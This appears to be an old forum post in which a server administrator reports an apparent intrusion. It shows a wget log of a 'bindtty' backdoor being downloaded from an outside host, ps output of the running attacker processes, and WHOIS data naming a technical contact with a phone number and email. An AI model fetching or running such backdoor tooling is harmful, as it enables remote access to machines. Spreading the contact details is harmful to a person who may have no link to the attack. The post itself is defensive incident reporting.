Bindtty Hack, Take A Look

This showed up in the logs of one of my servers!


--01:24:39-- http://raky.home.cosmic-cp/
=> `index.html.1'
Resolving raky.home.cosmic-cp... failed: Host not found.
--01:26:41-- http://raky.home.cosmic-cow.net/bindtty
=> `bindtty'
Resolving raky.home.cosmic-cow.net... done.
Connecting to raky.home.cosmic-cow.net[69.31.32.153]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12,637 [text/plain]

0K .......... .. 100% 108.25 KB/s

01:26:47 (108.25 KB/s) - `bindtty' saved [12637/12637]
Search results for: ! NET-69-31-32-0-1


OrgName: Quantum Tech Pty Ltd
OrgID: QTPL
Address: P.O. Box 6111
Address: Girrawheen
City: Perth
StateProv: WA
PostalCode: 6064
Country: AU

NetRange: 69.31.32.0 - 69.31.39.255
CIDR: 69.31.32.0/21
NetName: NLYR-69-31-32-0-1
NetHandle: NET-69-31-32-0-1
Parent: NET-69-31-0-0-1
NetType: Reallocated
NameServer: NS1.QUANTUM-TECH.COM
NameServer: NS2.QUANTUM-TECH.COM
Comment:
RegDate: 2003-04-12
Updated: 2003-04-12

OrgTechHandle: MVA6-ARIN
OrgTechName: Van Essen, Mike
OrgTechPhone: +61 8 9343 0428
OrgTechEmail: mike@quantumtech.net.au

# ARIN WHOIS database, last updated 2004-07-04 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.


Called this number and they are saying that they do not know any Mike or quantumtech.

ps -aux
---------------------------------------------------------------------------------
xxxxx 15978 0.0 0.0 1484 4 ? S Jul01 0:00 ./bindtty
xxxxx 14456 0.0 0.0 2380 48 ? S Jul01 0:00 SCREEN
xxxxx 14457 0.0 0.0 2204 52 pts/0 S Jul01 0:00 /bin/sh
xxxxx 14463 0.0 0.0 1404 8 pts/0 S Jul01 0:00 ./suck
xxxxx 14464 0.0 0.0 1384 4 pts/0 S Jul01 0:00 ./suck
------------------------------------------------------------------------------------

Anyone seen this before?

Pulling up http://raky.home.cosmic-cow.net/bindtty

Gives the following:

Holy?? I don't like the looks of this..

 

 

 

 
